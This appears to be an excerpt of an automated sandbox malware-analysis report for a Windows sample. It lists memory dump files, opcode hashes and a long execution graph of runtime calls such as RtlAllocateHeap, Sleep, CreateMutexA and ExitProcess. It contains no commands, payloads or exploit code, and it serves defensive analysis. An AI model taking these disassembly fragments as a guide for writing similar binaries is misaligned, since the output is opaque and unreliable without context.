                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                    • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                    • Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
                                                                                                                                                                    • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0
                                                                                                                                                                    Function 00FCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                    • Opcode ID: 1e25fd00b6645ea3f3f10a8d89662976f3497dfa54fee0d2e74eff1423a5f977
                                                                                                                                                                    • Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e25fd00b6645ea3f3f10a8d89662976f3497dfa54fee0d2e74eff1423a5f977
                                                                                                                                                                    • Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:1839
                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                    execution_graph 9838 611c60 9839 6280c0 RtlAllocateHeap 9838->9839 9840 611c71 9839->9840 9843 62d64e 9840->9843 9846 62d621 9843->9846 9847 62d630 9846->9847 9848 62d637 9846->9848 9852 64988e 9847->9852 9855 6498fa 9848->9855 9851 611c7b 9853 6498fa RtlAllocateHeap 9852->9853 9854 6498a0 9853->9854 9854->9851 9858 649630 9855->9858 9857 64992b 9857->9851 9859 64963c __dosmaperr 9858->9859 9862 64968b 9859->9862 9861 649657 9861->9857 9863 6496a7 9862->9863 9871 64971e __dosmaperr 9862->9871 9864 6496fe 9863->9864 9863->9871 9872 64edf6 9863->9872 9866 64edf6 RtlAllocateHeap 9864->9866 9864->9871 9868 649714 9866->9868 9867 6496f4 9869 64adf5 ___free_lconv_mon RtlAllocateHeap 9867->9869 9870 64adf5 ___free_lconv_mon RtlAllocateHeap 9868->9870 9869->9864 9870->9871 9871->9861 9871->9871 9873 64ee03 9872->9873 9874 64ee1e 9872->9874 9873->9874 9875 64ee0f 9873->9875 9876 64ee2d 9874->9876 9881 654fdc 9874->9881 9877 6475f6 __dosmaperr RtlAllocateHeap 9875->9877 9888 65500f 9876->9888 9880 64ee14 __cftof 9877->9880 9880->9867 9882 654fe7 9881->9882 9883 654ffc 9881->9883 9884 6475f6 __dosmaperr RtlAllocateHeap 9882->9884 9883->9876 9885 654fec 9884->9885 9886 646c5a __cftof RtlAllocateHeap 9885->9886 9887 654ff7 9886->9887 9887->9876 9889 655027 9888->9889 9890 65501c 9888->9890 9891 65502f 9889->9891 9895 655038 __dosmaperr 9889->9895 9897 64b04b 9890->9897 9893 64adf5 ___free_lconv_mon RtlAllocateHeap 9891->9893 9896 655024 9893->9896 9894 6475f6 __dosmaperr RtlAllocateHeap 9894->9896 9895->9894 9895->9896 9896->9880 9900 64b059 __dosmaperr 9897->9900 9898 6475f6 __dosmaperr RtlAllocateHeap 9899 64b087 9898->9899 9899->9896 9900->9898 9900->9899 9945 614276 9950 612410 9945->9950 9949 61428f 9951 612424 9950->9951 9965 62b52d 9951->9965 9954 613ce0 9955 613d42 9954->9955 9957 613d52 9954->9957 10068 627d50 9955->10068 9958 62d3e2 RtlAllocateHeap 9957->9958 9959 613d84 9958->9959 9960 627d50 RtlAllocateHeap 9959->9960 9962 613e03 9959->9962 9960->9962 9961 613e9b shared_ptr 9961->9949 9962->9961 9963 646c6a RtlAllocateHeap 9962->9963 9964 613ec1 9963->9964 9973 643aed 9965->9973 9967 61242a 9967->9954 9968 62b5a5 ___std_exception_copy 9980 62b1ad 9968->9980 9970 62b598 9976 62af56 9970->9976 9984 644f29 9973->9984 9977 62af9f ___std_exception_copy 9976->9977 9979 62afb2 shared_ptr 9977->9979 10044 62b39f 9977->10044 9979->9967 9981 62b1e1 shared_ptr 9980->9981 9982 62b1d8 9980->9982 9981->9967 9983 62b39f 5 API calls 9982->9983 9983->9981 9992 644f37 9984->9992 9986 62b555 9986->9967 9986->9968 9986->9970 9987 644f2e __cftof 9987->9986 9991 648bfc __cftof 9987->9991 9997 64d634 9987->9997 10018 6465ed 9991->10018 9993 644f40 9992->9993 9995 644f43 9992->9995 9993->9987 9994 644f77 9994->9987 9995->9994 9996 648ba3 ___std_exception_copy RtlAllocateHeap 9995->9996 9996->9994 9998 64d640 __dosmaperr 9997->9998 9999 64d667 __cftof 9998->9999 10000 64a7c8 __dosmaperr RtlAllocateHeap 9998->10000 10002 64d66d __cftof __dosmaperr 9998->10002 10001 64d6b2 9999->10001 9999->10002 10004 64d69c 9999->10004 10000->9999 10003 6475f6 __dosmaperr RtlAllocateHeap 10001->10003 10007 64d726 10002->10007 10008 64d81b __cftof 10002->10008 10010 64d751 __cftof 10002->10010 10005 64d6b7 10003->10005 10004->9991 10006 646c5a __cftof RtlAllocateHeap 10005->10006 10006->10004 10007->10010 10021 64d62b 10007->10021 10009 6465ed __cftof 3 API calls 10008->10009 10011 64d82e 10009->10011 10010->10004 10016 64d7a5 10010->10016 10024 64a671 10010->10024 10015 64d62b __cftof 4 API calls 10015->10010 10016->10004 10017 64a671 __cftof 4 API calls 10016->10017 10017->10004 10019 6464c7 __cftof 3 API calls 10018->10019 10020 6465fe 10019->10020 10022 64a671 __cftof 4 API calls 10021->10022 10023 64d630 10022->10023 10023->10015 10025 64a67b __dosmaperr 10024->10025 10026 64d82f __dosmaperr RtlAllocateHeap 10025->10026 10027 64a694 10025->10027 10028 64a6bc __dosmaperr 10026->10028 10029 64a722 10027->10029 10038 648bec 10027->10038 10031 64a6fc 10028->10031 10032 64a6c4 __dosmaperr 10028->10032 10029->10016 10034 64a49f __dosmaperr RtlAllocateHeap 10031->10034 10035 64adf5 ___free_lconv_mon RtlAllocateHeap 10032->10035 10036 64a707 10034->10036 10035->10027 10037 64adf5 ___free_lconv_mon RtlAllocateHeap 10036->10037 10037->10027 10039 648bf1 __cftof 10038->10039 10040 64d634 __cftof 4 API calls 10039->10040 10043 648bfc __cftof 10039->10043 10040->10043 10041 6465ed __cftof 3 API calls 10042 648c2f 10041->10042 10043->10041 10055 62bedf 10044->10055 10047 62b3e8 10047->9979 10064 62cc31 10055->10064 10058 646cbb 10059 646cc7 __dosmaperr 10058->10059 10060 64a671 __cftof 4 API calls 10059->10060 10063 646ccc 10060->10063 10061 648bec __cftof 4 API calls 10062 646cf6 10061->10062 10063->10061 10065 62cc3f InitOnceExecuteOnce 10064->10065 10067 62b3e1 10064->10067 10065->10067 10067->10047 10067->10058 10069 627d62 10068->10069 10070 627dcb 10068->10070 10072 627d9c 10069->10072 10073 627d6d 10069->10073 10071 612480 RtlAllocateHeap 10070->10071 10074 627d7a 10071->10074 10076 627db9 10072->10076 10079 62d3e2 RtlAllocateHeap 10072->10079 10073->10070 10075 627d74 10073->10075 10077 646c6a RtlAllocateHeap 10074->10077 10081 627d83 10074->10081 10078 62d3e2 RtlAllocateHeap 10075->10078 10076->9957 10085 627dd5 10077->10085 10078->10074 10080 627da6 10079->10080 10080->9957 10081->9957 10082 627f20 10083 629270 RtlAllocateHeap 10082->10083 10096 627e91 __cftof 10083->10096 10084 627e01 10084->9957 10085->10082 10085->10084 10086 627f1b 10085->10086 10088 627e80 10085->10088 10089 627ea7 10085->10089 10090 612480 RtlAllocateHeap 10086->10090 10087 646c6a RtlAllocateHeap 10095 627f2a __cftof 10087->10095 10088->10086 10091 627e8b 10088->10091 10093 62d3e2 RtlAllocateHeap 10089->10093 10089->10096 10090->10082 10092 62d3e2 RtlAllocateHeap 10091->10092 10092->10096 10093->10096 10094 627f61 shared_ptr 10094->9957 10095->10094 10097 646c6a RtlAllocateHeap 10095->10097 10096->10087 10098 627f02 shared_ptr 10096->10098 10099 627f7c 10097->10099 10098->9957 10100 61a079 10101 61a081 shared_ptr 10100->10101 10102 61a930 10101->10102 10103 61a154 shared_ptr 10101->10103 10104 646c6a RtlAllocateHeap 10102->10104 10106 6280c0 RtlAllocateHeap 10103->10106 10105 61a953 Sleep CreateMutexA 10104->10105 10108 61a98e 10105->10108 10107 61a903 10106->10107 10109 61cc79 10110 61cc84 shared_ptr 10109->10110 10111 61ccda shared_ptr std::invalid_argument::invalid_argument 10110->10111 10112 646c6a RtlAllocateHeap 10110->10112 10113 61ce36 10112->10113 10119 627a00 10113->10119 10115 61ce92 10133 615c10 10115->10133 10117 61ce9d 10184 61ca70 10117->10184 10120 627a26 10119->10120 10121 627a2d 10120->10121 10122 627a62 10120->10122 10123 627a81 10120->10123 10121->10115 10124 627ab9 10122->10124 10125 627a69 10122->10125 10127 62d3e2 RtlAllocateHeap 10123->10127 10130 627a76 __cftof 10123->10130 10128 612480 RtlAllocateHeap 10124->10128 10126 62d3e2 RtlAllocateHeap 10125->10126 10129 627a6f 10126->10129 10127->10130 10128->10129 10129->10130 10131 646c6a RtlAllocateHeap 10129->10131 10130->10115 10132 627ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10131->10132 10132->10115 10204 615940 10133->10204 10135 615c54 10207 614b30 10135->10207 10138 615d17 shared_ptr std::invalid_argument::invalid_argument 10138->10117 10139 646c6a RtlAllocateHeap 10140 615d47 __cftof 10139->10140 10140->10140 10141 6280c0 RtlAllocateHeap 10140->10141 10143 615e3e 10141->10143 10142 615ea6 shared_ptr std::invalid_argument::invalid_argument 10142->10117 10143->10142 10144 646c6a RtlAllocateHeap 10143->10144 10145 615ed2 10144->10145 10146 615ffe shared_ptr std::invalid_argument::invalid_argument 10145->10146 10147 646c6a RtlAllocateHeap 10145->10147 10146->10117 10148 61601b 10147->10148 10149 6280c0 RtlAllocateHeap 10148->10149 10150 616089 10149->10150 10151 6280c0 RtlAllocateHeap 10150->10151 10152 6160bd 10151->10152 10153 6280c0 RtlAllocateHeap 10152->10153 10154 6160ee 10153->10154 10155 6280c0 RtlAllocateHeap 10154->10155 10156 61611f 10155->10156 10157 6280c0 RtlAllocateHeap 10156->10157 10159 616150 10157->10159 10158 6165b1 shared_ptr std::invalid_argument::invalid_argument 10158->10117 10159->10158 10160 646c6a RtlAllocateHeap 10159->10160 10161 6165dc 10160->10161 10162 627a00 RtlAllocateHeap 10161->10162 10163 6166a6 10162->10163 10164 615c10 4 API calls 10163->10164 10165 6166ac 10164->10165 10166 615c10 4 API calls 10165->10166 10167 6166b1 10166->10167 10214 6122c0 10167->10214 10169 6166c9 shared_ptr 10170 627a00 RtlAllocateHeap 10169->10170 10171 616732 10170->10171 10172 615c10 4 API calls 10171->10172 10173 61673d 10172->10173 10174 6122c0 4 API calls 10173->10174 10183 616757 shared_ptr 10174->10183 10175 616852 10176 6280c0 RtlAllocateHeap 10175->10176 10178 61689c 10176->10178 10177 627a00 RtlAllocateHeap 10177->10183 10179 6280c0 RtlAllocateHeap 10178->10179 10181 6168e3 shared_ptr std::invalid_argument::invalid_argument 10179->10181 10180 615c10 4 API calls 10180->10183 10181->10117 10182 6122c0 4 API calls 10182->10183 10183->10175 10183->10177 10183->10180 10183->10182 10185 61cadd 10184->10185 10187 627a00 RtlAllocateHeap 10185->10187 10189 61cc87 10185->10189 10186 61ccda shared_ptr std::invalid_argument::invalid_argument 10188 61ccee 10187->10188 10190 615c10 4 API calls 10188->10190 10189->10186 10191 646c6a RtlAllocateHeap 10189->10191 10192 61ccf9 10190->10192 10193 61ce36 10191->10193 10660 619030 10192->10660 10195 627a00 RtlAllocateHeap 10193->10195 10197 61ce92 10195->10197 10196 61cd0d 10673 628220 10196->10673 10199 615c10 4 API calls 10197->10199 10201 61ce9d 10199->10201 10200 61cd1f 10681 628f40 10200->10681 10202 61ca70 4 API calls 10201->10202 10217 627f80 10204->10217 10206 61596b 10206->10135 10208 614dc2 10207->10208 10212 614b92 10207->10212 10208->10138 10208->10139 10210 614ce5 10210->10208 10211 628ca0 RtlAllocateHeap 10210->10211 10211->10210 10212->10210 10232 646da6 10212->10232 10237 628ca0 10212->10237 10374 612280 10214->10374 10220 627fc7 10217->10220 10222 627f9e __cftof 10217->10222 10218 6280b3 10219 629270 RtlAllocateHeap 10218->10219 10221 6280b8 10219->10221 10220->10218 10223 62801b 10220->10223 10224 62803e 10220->10224 10225 612480 RtlAllocateHeap 10221->10225 10222->10206 10223->10221 10227 62d3e2 RtlAllocateHeap 10223->10227 10228 62d3e2 RtlAllocateHeap 10224->10228 10229 62802c __cftof 10224->10229 10226 6280bd 10225->10226 10227->10229 10228->10229 10230 646c6a RtlAllocateHeap 10229->10230 10231 628095 shared_ptr 10229->10231 10230->10218 10231->10206 10233 646db4 10232->10233 10235 646dc2 10232->10235 10252 646d19 10233->10252 10235->10212 10238 628cc3 10237->10238 10239 628dc9 10237->10239 10243 628d05 10238->10243 10244 628d2f 10238->10244 10240 629270 RtlAllocateHeap 10239->10240 10241 628dce 10240->10241 10242 612480 RtlAllocateHeap 10241->10242 10250 628d16 __cftof 10242->10250 10243->10241 10245 628d10 10243->10245 10248 62d3e2 RtlAllocateHeap 10244->10248 10244->10250 10247 62d3e2 RtlAllocateHeap 10245->10247 10246 646c6a RtlAllocateHeap 10249 628dd8 10246->10249 10247->10250 10248->10250 10250->10246 10251 628d8b shared_ptr __cftof 10250->10251 10251->10212 10257 64690a 10252->10257 10256 646d3d 10256->10212 10258 646921 10257->10258 10259 64692a 10257->10259 10265 646d52 10258->10265 10259->10258 10260 64a671 __cftof 4 API calls 10259->10260 10261 64694a 10260->10261 10271 64b5fb 10261->10271 10266 646d8f 10265->10266 10267 646d5f 10265->10267 10358 64b67d 10266->10358 10268 646d6e 10267->10268 10353 64b6a1 10267->10353 10268->10256 10272 646960 10271->10272 10273 64b60e 10271->10273 10275 64b628 10272->10275 10273->10272 10279 64f5ab 10273->10279 10276 64b63b 10275->10276 10278 64b650 10275->10278 10276->10278 10292 64e6b1 10276->10292 10278->10258 10280 64f5b7 __dosmaperr 10279->10280 10281 64a671 __cftof 4 API calls 10280->10281 10283 64f5c0 __dosmaperr 10281->10283 10282 64f606 10282->10272 10283->10282 10288 64f62c 10283->10288 10285 64f5ef __cftof 10285->10282 10286 648bec __cftof 4 API calls 10285->10286 10287 64f62b 10286->10287 10289 64f647 10288->10289 10290 64f63a __cftof 10288->10290 10289->10285 10290->10289 10291 64f35f __cftof RtlAllocateHeap 10290->10291 10291->10289 10293 64a671 __cftof 4 API calls 10292->10293 10294 64e6bb 10293->10294 10297 64e5c9 10294->10297 10296 64e6c1 10296->10278 10298 64e5d5 __dosmaperr 10297->10298 10300 64e5ef __cftof 10298->10300 10305 64adf5 ___free_lconv_mon RtlAllocateHeap 10298->10305 10299 64e5f6 10299->10296 10300->10299 10301 648bec __cftof 4 API calls 10300->10301 10302 64e668 10301->10302 10303 64e6a4 10302->10303 10308 64a72e 10302->10308 10303->10296 10305->10300 10309 64a739 __dosmaperr 10308->10309 10310 64a745 10309->10310 10312 64d82f __dosmaperr RtlAllocateHeap 10309->10312 10311 648bec __cftof 4 API calls 10310->10311 10314 64a7be 10310->10314 10313 64a7c7 10311->10313 10315 64a769 __dosmaperr 10312->10315 10322 64e4b0 10314->10322 10316 64a7a5 10315->10316 10317 64a771 __dosmaperr 10315->10317 10319 64a49f __dosmaperr RtlAllocateHeap 10316->10319 10318 64adf5 ___free_lconv_mon RtlAllocateHeap 10317->10318 10318->10310 10320 64a7b0 10319->10320 10321 64adf5 ___free_lconv_mon RtlAllocateHeap 10320->10321 10321->10310 10323 64e5c9 __cftof 4 API calls 10322->10323 10324 64e4c3 10323->10324 10341 64e259 10324->10341 10327 64e4dc 10327->10303 10328 64b04b __cftof RtlAllocateHeap 10329 64e4ed 10328->10329 10330 64e51f 10329->10330 10344 64e6c4 10329->10344 10333 64adf5 ___free_lconv_mon RtlAllocateHeap 10330->10333 10332 64e512 10334 64e51a 10332->10334 10338 64e535 __cftof 10332->10338 10335 64e52d 10333->10335 10336 6475f6 __dosmaperr RtlAllocateHeap 10334->10336 10335->10303 10336->10330 10337 64e561 10337->10330 10349 64e14b 10337->10349 10338->10337 10339 64adf5 ___free_lconv_mon RtlAllocateHeap 10338->10339 10339->10337 10342 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10341->10342 10343 64e26b 10342->10343 10343->10327 10343->10328 10345 64e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10344->10345 10346 64e6e4 __cftof 10345->10346 10347 64e75a __cftof std::invalid_argument::invalid_argument 10346->10347 10348 64e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10346->10348 10347->10332 10348->10347 10350 64e157 __dosmaperr 10349->10350 10351 64e198 __cftof RtlAllocateHeap 10350->10351 10352 64e16e __cftof 10351->10352 10352->10330 10354 64690a __cftof 4 API calls 10353->10354 10356 64b6be 10354->10356 10355 64b6ce std::invalid_argument::invalid_argument 10355->10268 10356->10355 10363 64f1bf 10356->10363 10359 64a671 __cftof 4 API calls 10358->10359 10360 64b688 10359->10360 10361 64b5fb __cftof 4 API calls 10360->10361 10362 64b698 10361->10362 10362->10268 10364 64690a __cftof 4 API calls 10363->10364 10365 64f1df __cftof 10364->10365 10366 64b04b __cftof RtlAllocateHeap 10365->10366 10367 64f29d std::invalid_argument::invalid_argument 10365->10367 10369 64f232 __cftof 10365->10369 10366->10369 10367->10355 10370 64f2c2 10369->10370 10371 64f2df 10370->10371 10372 64f2ce 10370->10372 10371->10367 10372->10371 10373 64adf5 ___free_lconv_mon RtlAllocateHeap 10372->10373 10373->10371 10375 612296 10374->10375 10378 6487f8 10375->10378 10381 647609 10378->10381 10380 6122a4 10380->10169 10382 647631 10381->10382 10383 647649 10381->10383 10384 6475f6 __dosmaperr RtlAllocateHeap 10382->10384 10383->10382 10385 647651 10383->10385 10387 647636 10384->10387 10386 64690a __cftof 4 API calls 10385->10386 10389 647661 10386->10389 10388 646c5a __cftof RtlAllocateHeap 10387->10388 10390 647641 std::invalid_argument::invalid_argument 10388->10390 10394 647bc4 10389->10394 10390->10380 10410 64868d 10394->10410 10396 6476e8 10407 647a19 10396->10407 10397 647be4 10398 6475f6 __dosmaperr RtlAllocateHeap 10397->10398 10399 647be9 10398->10399 10400 646c5a __cftof RtlAllocateHeap 10399->10400 10400->10396 10401 647bd5 10401->10396 10401->10397 10417 647d15 10401->10417 10425 648168 10401->10425 10430 647dc2 10401->10430 10435 647de8 10401->10435 10464 647f36 10401->10464 10408 64adf5 ___free_lconv_mon RtlAllocateHeap 10407->10408 10409 647a29 10408->10409 10409->10390 10411 6486a5 10410->10411 10412 648692 10410->10412 10411->10401 10413 6475f6 __dosmaperr RtlAllocateHeap 10412->10413 10414 648697 10413->10414 10415 646c5a __cftof RtlAllocateHeap 10414->10415 10416 6486a2 10415->10416 10416->10401 10486 647d34 10417->10486 10419 647d1a 10420 647d31 10419->10420 10421 6475f6 __dosmaperr RtlAllocateHeap 10419->10421 10420->10401 10422 647d23 10421->10422 10423 646c5a __cftof RtlAllocateHeap 10422->10423 10424 647d2e 10423->10424 10424->10401 10426 648171 10425->10426 10427 648178 10425->10427 10495 647b50 10426->10495 10427->10401 10431 647dd2 10430->10431 10432 647dcb 10430->10432 10431->10401 10433 647b50 4 API calls 10432->10433 10434 647dd1 10433->10434 10434->10401 10436 647def 10435->10436 10437 647e09 10435->10437 10439 647fbb 10436->10439 10441 647f4f 10436->10441 10451 647e39 10436->10451 10438 6475f6 __dosmaperr RtlAllocateHeap 10437->10438 10437->10451 10440 647e25 10438->10440 10443 648001 10439->10443 10444 647fc2 10439->10444 10453 647f92 10439->10453 10442 646c5a __cftof RtlAllocateHeap 10440->10442 10449 647f5b 10441->10449 10441->10453 10446 647e30 10442->10446 10554 648604 10443->10554 10447 647fc7 10444->10447 10448 647f69 10444->10448 10446->10401 10447->10453 10455 647fcc 10447->10455 10461 647f77 10448->10461 10463 647f8b 10448->10463 10548 648241 10448->10548 10449->10448 10454 647fa2 10449->10454 10449->10461 10451->10401 10453->10461 10453->10463 10539 648420 10453->10539 10454->10463 10525 648390 10454->10525 10456 647fd1 10455->10456 10457 647fdf 10455->10457 10456->10463 10529 6485e5 10456->10529 10533 648571 10457->10533 10461->10463 10557 6486ea 10461->10557 10463->10401 10465 647f4f 10464->10465 10466 647fbb 10464->10466 10472 647f5b 10465->10472 10476 647f92 10465->10476 10467 648001 10466->10467 10468 647fc2 10466->10468 10466->10476 10471 648604 RtlAllocateHeap 10467->10471 10469 647fc7 10468->10469 10470 647f69 10468->10470 10475 647fcc 10469->10475 10469->10476 10474 648241 4 API calls 10470->10474 10483 647f77 10470->10483 10485 647f8b 10470->10485 10471->10483 10472->10470 10477 647fa2 10472->10477 10472->10483 10473 648420 RtlAllocateHeap 10473->10483 10474->10483 10478 647fd1 10475->10478 10479 647fdf 10475->10479 10476->10473 10476->10483 10476->10485 10481 648390 4 API calls 10477->10481 10477->10485 10482 6485e5 RtlAllocateHeap 10478->10482 10478->10485 10480 648571 RtlAllocateHeap 10479->10480 10480->10483 10481->10483 10482->10483 10484 6486ea 4 API calls 10483->10484 10483->10485 10484->10485 10485->10401 10489 647d5e 10486->10489 10488 647d40 10488->10419 10490 647d80 10489->10490 10491 647db7 10490->10491 10492 6475f6 __dosmaperr RtlAllocateHeap 10490->10492 10491->10488 10493 647dac 10492->10493 10494 646c5a __cftof RtlAllocateHeap 10493->10494 10494->10491 10496 647b62 10495->10496 10499 647b67 10495->10499 10497 6475f6 __dosmaperr RtlAllocateHeap 10496->10497 10497->10499 10503 648ab6 10499->10503 10501 6475f6 __dosmaperr RtlAllocateHeap 10502 647b99 10501->10502 10502->10401 10504 648ad1 10503->10504 10507 648868 10504->10507 10508 64868d RtlAllocateHeap 10507->10508 10512 64887a 10508->10512 10509 6488b3 10510 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10509->10510 10517 6488bf 10510->10517 10511 64888f 10513 6475f6 __dosmaperr RtlAllocateHeap 10511->10513 10512->10509 10512->10511 10524 647b85 10512->10524 10514 648894 10513->10514 10516 646c5a __cftof RtlAllocateHeap 10514->10516 10515 646d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10515->10517 10516->10524 10517->10515 10518 6488ee 10517->10518 10520 648a8d RtlAllocateHeap 10518->10520 10521 648958 10518->10521 10519 648a8d RtlAllocateHeap 10522 648a20 10519->10522 10520->10521 10521->10519 10523 6475f6 __dosmaperr RtlAllocateHeap 10522->10523 10522->10524 10523->10524 10524->10501 10524->10502 10527 6483ab 10525->10527 10526 6483dd 10526->10461 10527->10526 10561 64c88e 10527->10561 10530 6485f1 10529->10530 10531 648420 